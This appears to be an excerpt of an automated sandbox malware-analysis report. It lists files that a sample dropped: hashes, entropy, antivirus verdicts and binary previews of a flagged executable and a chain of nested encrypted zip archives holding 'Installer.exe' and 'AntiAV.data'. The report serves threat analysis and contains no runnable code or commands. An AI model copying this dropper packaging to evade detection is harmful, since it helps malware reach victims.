                                                                                                                                                                                                            SHA-512:9D8E49DE5D5947E8CC682CC70D81191B380260233F26EAB25BEB1398F745EF47EA297A4AAD6D0B30F87AC65EC5B90B5E4516AFABF57CCB519BC4FF6A002D1566
                                                                                                                                                                                                            Malicious:true
                                                                                                                                                                                                            Antivirus:
                                                                                                                                                                                                            • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                            • Antivirus: ReversingLabs, Detection: 92%
                                                                                                                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......//.kN..kN..kN...%..aN...%...N...%..yN..9;..zN..9;..zN..9;..CN...%..bN..kN..0N..=;..jN..=;y.jN..kN..jN..=;..jN..RichkN..........................PE..L....v:a.................&...X)..............@....@...........................*.....^B....@.....................................d.....).................8.....*........8...............................@............@..H............................text...)%.......&.................. ..`.rdata...x...@...z...*..............@..@.data.....'.........................@....rsrc.........).....................@..@.reloc........*.....................@..B........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511531
                                                                                                                                                                                                            Entropy (8bit):7.998133089879453
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:J3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:lFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                                            MD5:392805D581FCA99EDCB5F947E3EBB2CC
                                                                                                                                                                                                            SHA1:49506423DE1FE1A89C50BF492E57998A590B9EE6
                                                                                                                                                                                                            SHA-256:4A4CD834312421431D41AA5A988FC2FBBCA4165961F9B023CFC2B21EFAD858ED
                                                                                                                                                                                                            SHA-512:7D191C9D592739BA54AD6D0BEEA26790B5020CEFAD5AD778FDB5695C13E848E7EFBFE43A1C9DA098DB1AE5E3BC758924746A3CAC2CE5C8AAE1371EBBBF50746A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d.....i^....XT.7._=9d.as....O3PdW.;%..,.V.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512845
                                                                                                                                                                                                            Entropy (8bit):7.998150131603083
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:B/3FvrlOjguZKmxM1J/NPT5R82orQYR7truFC/Hd:BvFojtZ/u1JlPTLexxrD/d
                                                                                                                                                                                                            MD5:0067A8449FAD7927F7CCD78AD32DDC6C
                                                                                                                                                                                                            SHA1:53BF7574BF168C644D40E2404F2346528FB16F18
                                                                                                                                                                                                            SHA-256:CFAEEED5348C9AC2D172D31FD2CDFFB253D6BCBE44FC325D490BC368F5229989
                                                                                                                                                                                                            SHA-512:6D6D9734833DE212E92C242E08EEEE4BB6D8CEAC2EE6F2AC0BAFA30573E0EFBC8A1EF0DE071B71950D9AB3A524580BC9EEC9EB420E6AFA8A2711EF248372AF14
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y.I............file_9.zipd.Sl-l....;..S..]....m.v...m.;Hf2......|w.b-%Yp.8..>.;.m...Z.yh.....o3............9h...?......f..,4.?....o...._.\..I..&...?...a.&.!y[gggR.......R....7...}.......9g...i.;....E.._...;.S../.....!..-.l..g-.G...e....z'{.....X..5?......O..u...G....?.@..*0d..&l.FBVX.;2(P.#...$.......F..V..#.....VZ...p.....JNL...7~.d.Q&..../...+2..].a9..Oe........W..z ....lrh'G.+..$Y..........)|......W.W.{..O...I.F.=....{$....m...F|.<.......6n._.......U.z.H<l.*..6.<...S.V.......?'_........Dpw..@.....].L....j.....|J..........u....w.l.....,_.............e-)..I.y.....VK...-\z.b..:O..b.E.=]..c.....|.k.6`xo.[.'.B.7Z.$..B2L"....k....acN.........W.k..W......5.....f..~...<>............*T.h.u...](p..v..i...../d.....6.;.0.. ..l1....-KkJK..n..3.id..it...'...b...m....H.....]...1..%.bKO9...-..&D].[.O;....]....Bro..m...?,..(.`.....m.D..m.....v..ue......+...9yN.Cy=.U.|.V.....sl|.S..Go. .H.=.!?..V....),..w....wG...Q9.L.5...0..
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2180530
                                                                                                                                                                                                            Entropy (8bit):7.99835792425981
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:49152:fujCK3D0AC/l5mwbBkDWYb1ZN4UJ9oc0/uNUrT1:faR3D0Ae5mwdkDWm1Xoe4T1
                                                                                                                                                                                                            MD5:7632984F9B26DBB8923DA2348366665B
                                                                                                                                                                                                            SHA1:C99703AD6DB21039BA169A60C106A08B2BCDB139
                                                                                                                                                                                                            SHA-256:69B1C0618D5418CE0E37171191F4AE23986B56779116ED29C3417089654FA897
                                                                                                                                                                                                            SHA-512:543750B4FD6BC31884296D8CF0BF8DAF56A90ED4223BD7B7650DC2B668DA4965718F1511459A2900AB8D975923256918415076A2F7E0FF2FAA454522097B1E95
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y.F._Cq....#.....AntiAV.data..E..@.D..C/qwg..;...mG.3H..|...$..}.`..8......lV1*..4...Cu.H.(l+{Cl.:........$+Nr....\.u.K_1N:k.'....F...... .....+.70..R.>..A..#6L.:..n..7......Y..y......v.,....=...e....fe.4.@...h..+....=.#...T....*..A..|...{A.p{.b*.|.[...Q...z.v.....iD.....W.....;...........YVL._._.F..4./g;syC.....e,.N..>t.43..p.T4?.K.....:Z.XDVS.gj.)cp..A9.7^.d.M.d.j..c:.(T<J._3-..8.,."s.'...B\.q...\..e.!..{l.\.]'.P.2}..l@^.G...{n..p..u.n.1;W..#..p.A.YD7.....,.o..z;.6T../.w..=.3K5..]............U...,r....n....(..I.....Q.o%.NF..Q.h$y.".7.tU..eVe.b.q.S4%"C..$g..iX..XQl..?Z.U.|.g....&.d..Y.|..5O...s.|..A..@.Y1F.o.o.s.'UY.AU#....D.K.....A....=t.M..L4...{.....BF.Rg.-...j..p.c..'.2....].m..w37t...Rn.r....v....W..g0E......)-.6.=v/.9...o..~.mh.U.&...5.ld4k.gG.G.S.w4G..]'.5......r..Q.U.U.9.Vv....2.>....p.s.p..e....(..}Jox.....Z..[Y..ku.....5....s.././....:...v......h.u.ZlG.>).,.(....Ye<.....3...:T:)...-).=.L.=.2F....&H7..j..\.B6.Ox.\....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511685
                                                                                                                                                                                                            Entropy (8bit):7.998145921569035
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:u3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L7:YFmr9DV6TJpZxXEL9rNX7
                                                                                                                                                                                                            MD5:BD4D86CA5CBAE5438024F64045DB97F6
                                                                                                                                                                                                            SHA1:67BA58848842592A9E2F8DD2D1ED97FD3E7D38CB
                                                                                                                                                                                                            SHA-256:C64F47CE2527018D5D52CCFEA53103762A1D91146D09938237215AF6968DFAB3
                                                                                                                                                                                                            SHA-512:4B5DCE84CDF649CDDFA499A6F875FB00676051E650178A0A742EEA62B91CFF0055CF6B5D2C1517AC500398D531A6F4A02131ED9CCD135B3C4A5BA18D4E2DDCE7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X.u..<n9.v..=....a.`.n.e......u......d...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511839
                                                                                                                                                                                                            Entropy (8bit):7.998154920833029
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:E3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lj:SFmr9DV6TJpZxXEL9rNXj
                                                                                                                                                                                                            MD5:8854D4E74C1AE01EAA463330A17CF2BD
                                                                                                                                                                                                            SHA1:9BFAB26E3B7CC05E4D94DE9930FD1428395458F3
                                                                                                                                                                                                            SHA-256:DF9ADC70A263FCEBE4F6EF88404AC0ACF424F2596F3F191A2FFB752B9D4BB064
                                                                                                                                                                                                            SHA-512:8C45E9A2F2187FA94DA24835B8F318741F682962211BFDEC5E5BA912112B5717DB4E4AED6E128C985FBEA016980F071D4961549F680B9FE0AB97884FA6559A0A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y.q<.[..N!.c.J.....f$.......@3..%Ic."f..X
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):511993
                                                                                                                                                                                                            Entropy (8bit):7.998157069875339
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:V3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7Lk:pFmr9DV6TJpZxXEL9rNXk
                                                                                                                                                                                                            MD5:FEA1BC14AFA3E37F1E15EB337E72B12C
                                                                                                                                                                                                            SHA1:148F4DEBB7F4E31EE7C1C04A11C45B0083043156
                                                                                                                                                                                                            SHA-256:6C1795FC843B77D29BD5F103DFC100C8928B7551F01FD8135F21C078B8533A7F
                                                                                                                                                                                                            SHA-512:07BCF6FC543D31B6902CA156C3F84A34FE421A8056DDC6533CD32D67B1C3D10A554556C2C28EA656EC4540EDD3B82FE4C5F677115F7C1BBFE4BE7E0CC57CA1A3
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q...u.....0:.......'...1...=A)...s6S.y
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512147
                                                                                                                                                                                                            Entropy (8bit):7.998155444192939
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:w3Fvr/KrgOD4W/iTJxnZxZt84otoKPF7rcFC7L4:GFmr9DV6TJpZxXEL9rNX4
                                                                                                                                                                                                            MD5:FC6106C411428E421DE593673892B72F
                                                                                                                                                                                                            SHA1:B5C1F38E1198E26FA2C2B786000E797676794045
                                                                                                                                                                                                            SHA-256:C165A3D777629605669D5C7AC7D55240A8DF0CB59686DD91D8A6111C03C67EBE
                                                                                                                                                                                                            SHA-512:BF46CA3B6E8DFED16CD701E05E194EB77B7E94FDE74DB260C7E9F679768DD7A1D516A20DE5ECE5E04B850D9582127A883F174C22CD2F47786EB53258EE4DD4A4
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y...............file_4.zipPK........Rn.Y..uB_..._.......file_3.zipPK........Rn.Y$..[............file_2.zipPK........Rn.Yr...+...+.......file_1.zipPK........Kn.Y..5....8.......Installer.exe.\}`.....K.pa...1.)A...4........)..&..i<.R......9.f8.....R.....?J/.&.*........5J...l.o..H.....|.y.f.....Zr...!I...iJ.^...H...c..I...$=9....V.|.........Ol.....o..U.m....w..]~c...w.[.UzzZv...W..6.....in.W..X.."..W. .....{E.M.......~u.h..k......UD.......S.U.....:.._.)....6..V....^.n.h.4K...^s.(.=.&.&.F...KR..=.K.+...,u.:..@.v,....=6i.%v\...e;W.]....>z....M.mR.Y...l...t...5.U......sm. 1Vy<.W.n.j.[.[.........8..WY`.H.2.....<.!..U.6o..i.U.YJC..........9.. ~...pK....O.u._.J.4)...S<..Ai.-.......J&;.Q.9...J].u....Q...a..$..".?.4#.....w.....d...TI...J.......g.....t.i....S..m.H...1...E.J..+b.Rl,z....G)L?..... ..*.,..T..O.....@...5.......$....j,+.`.+b.oc;...X..,"U...&.6.f...J......].2.+...)...R...B.=....L.u........l....S.=..:....6..@t;.r...w..d..(bA..fAJ....q
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512233
                                                                                                                                                                                                            Entropy (8bit):7.99811336541424
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:33Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNK:HFy5fZdkDJv73bChNrTRK
                                                                                                                                                                                                            MD5:DFCB1DBB6A046FD464412CCD1DAE66FE
                                                                                                                                                                                                            SHA1:512DBB73C6BDC9DB181C48BC3BADDFCB36BD018F
                                                                                                                                                                                                            SHA-256:0CC1DD7548213C1868612CDB992F566AA701D77A9AE018C709C450561DD22AD9
                                                                                                                                                                                                            SHA-512:AF57425587F0590E80386BC947A06330F785B1130A4CC34AAA48008EB74D17F5618D59FBBD796CFCB2F2B207CC07413E0878FFFB625239ABE2869B653F9F9780
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....n.....N,.;..h..n.w..U.........c>.Bo*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512387
                                                                                                                                                                                                            Entropy (8bit):7.998123873104573
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:H3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNV:XFy5fZdkDJv73bChNrTRV
                                                                                                                                                                                                            MD5:B7C74415382E8A9078A3A9467BD12517
                                                                                                                                                                                                            SHA1:69E51182E425ED6A13D0D021B0BAD8301A1792F5
                                                                                                                                                                                                            SHA-256:4BF6B02FE0358DC56339BBC0A26ABE7BE1ABED63B74EB975EC76C356952BDE5B
                                                                                                                                                                                                            SHA-512:3E3EDB65B5A2BB69B769922D71259ACA795DE6C84C64458FE4DEB4236BCAB6B7A9919955B72E34D720B4D84445CEF23B081FBE5A7688B6CDD25DE5200D96F361
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r..I..iP.I.......V}.> .*...r...Q..:....
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512541
                                                                                                                                                                                                            Entropy (8bit):7.998130338127172
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:g3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNM:2Fy5fZdkDJv73bChNrTRM
                                                                                                                                                                                                            MD5:C9C7BB282A5727DA7E9E1F4E9D8D3FBA
                                                                                                                                                                                                            SHA1:79B0AA3EEB4E3A998B357DAC97473948F68EF773
                                                                                                                                                                                                            SHA-256:BE879EFDEC472650B101D7BAFE4A1903A7CDDDB8A623A154921C230014D1A19E
                                                                                                                                                                                                            SHA-512:E96D16A720B7EE79FE0E059E00A26D833A7B2DB7F58B5220B5E0131A4A5DED923AD59B9BF500E46BAEFCCB8EE0F354CAF9F737CF0371F6AA47C92F3EABB63AA7
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a....#.-3.q.q......n_'...R3.....w...C.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):512695
                                                                                                                                                                                                            Entropy (8bit):7.998132491458882
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:12288:U3Fvrpo5g6ZWKHEDJnv73rP8woTiizbxr+FCrNw:iFy5fZdkDJv73bChNrTRw
                                                                                                                                                                                                            MD5:3B90F281C49BDF17DA4ADF690E2A475D
                                                                                                                                                                                                            SHA1:86821013A23E5048882BF58711D0549695ACA67D
                                                                                                                                                                                                            SHA-256:864947AD239B5E7B903C862FADF82E296EE048D73B70F4FCA516770271F2A741
                                                                                                                                                                                                            SHA-512:6F92DB4B36DF182BFB576863A1DF1A8C3AF4929135226ABE5B6B3C59FE6F43E39E4563CCDD22F35D28277B8C826590079A1DEB68BE39F7609E7FDEFAA4209B9E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Ye.*............file_8.zipPK........Rn.Y...............file_7.zipPK........Rn.Y.p.............file_6.zipPK........Rn.Y.?+.O...........file_5.zipd.UP....`$............P..vqw'...n...........tg........."......K..[.....e.....w...........]J......_....:%T.p...........:.../....q..a....!./....3...#...._UYG7w.{{.WV..X...7.....X..s6A.G..a....E........6..0K..i#.R[A..Lj..QZ........-,..J..X...6.v:P.#..-.>...S........}gy8...5..:.:J!...o#7g8..$..2m.\"..M-... .iM...f..r.|...R..!yk....y.p.....q`.`....U......9..}.....v\c.x.....M.}..D>...T.+I.8.Z.......m...-2...USb.... .C.[3..}......@.T..[....4[o8.m..-..m..F.-.C.D;&.+.Y^-.. ........G......'s...v. .....O.A...M....A..O....b...V.n....2.;..'...+,...C09...@.v.c..|...>.\..[Wd.~...@m].9.w.......G..g.l^.v..X.X]9.............2..xg.....@..#..Cn...-u...\Q.'......UL9Z.Y..!_.9.....H.x..C........2L......z..;.g..||tICv-..M.;..01z..+.&........xX=~..Z.b...,^.B.%...M....5T.AA8....-..,.... .2Tp..H..A.Og..G.a.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Local\Temp\OMUHDBFZQVAGPU7TP51CCEGFD7IXXU4.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2180698
                                                                                                                                                                                                            Entropy (8bit):7.99990891733921
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                                            MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                                            SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                                            SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                                            SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Preview:PK........Rn.Yh.2..E!..E!.....file_11.zip.aO.Y.......9m.X..v..&....j^..U.........9>..&....;.M.B.....>Ez...(..v..........X.<..._..f.o?..l...?../s .-...u.m.i.!%.E.@w...do/.W/..=.#.....Lde...QQN....Cu..w..P.d....Y..2z.I.f$DUo}WA.....h[....H4....b..`...k.#....fo..g..UA.....j..;......N.?...[..+.|.Ob....W...iS3...6.......fJ.......[.u!.BW.OH..:9..*/_....O.!]...@....{V.....}.T.I.C"...X+_V*.s.|V..o....$;Cr...V....?.5b..g..x.C.a...k1..n..,2..6....}....Q....gq3U.X......].w..T.buX..!.?..Q......_`.....K..B.........b......U...bqA..F+....cf5....,.I.m......qu...#..%.k.....AH.K..:..zq.~.....h...L6.8L;...6..l....Vr.3.,....w(.mj..b...Kf...u...M..V..IV.-.....G+......h[I.Vs...U.5...c':..u..3S...'@.[...;.L...4f.].D.A..TB....P.'.l.X....o...n......l.+..8b.dN.Y...`.@.r.j.i)...K+:.Tr.:<W...L.@.}.......Y.A/.bf.N......-L...X....R.:.n.cq.........&..h|.5.m..z.........y.d..>...Q#..p.7..6.C....Q.l...R..O.'!.,...'...|Y~.`*$.D..kSD...kdl%x...T2Uo..<.......q}"......}Rzw..Y..u
                                                                                                                                                                                                            Process:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                            File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):2180698
                                                                                                                                                                                                            Entropy (8bit):7.99990891733921
                                                                                                                                                                                                            Encrypted:true
                                                                                                                                                                                                            SSDEEP:49152:5RcsCieJLOveuKY6V5Rqgoq1cZvGcn2MyelH+5VTwQx6HtqVNP6ph:Pcs2JOmvR0qTClH+5VMNh
                                                                                                                                                                                                            MD5:AE5771940899F79E634B6E4475040467
                                                                                                                                                                                                            SHA1:225434A4900232053FBEFF5A60A08E53CFC1436A
                                                                                                                                                                                                            SHA-256:B9740CF94F4A77BB2D61EC79FF342E7C739BB35B2B61F32E9B5F2D09218C24FC
                                                                                                                                                                                                            SHA-512:2B50DA042539E81EA4B1B5DBDE62F3AEE6473DF550401DF2BC08505FC77A178994AB6608960251873B48089AE171E6365AE52408A493E71389B98D4796898134
                                                                                                                                                                                                            Malicious:false
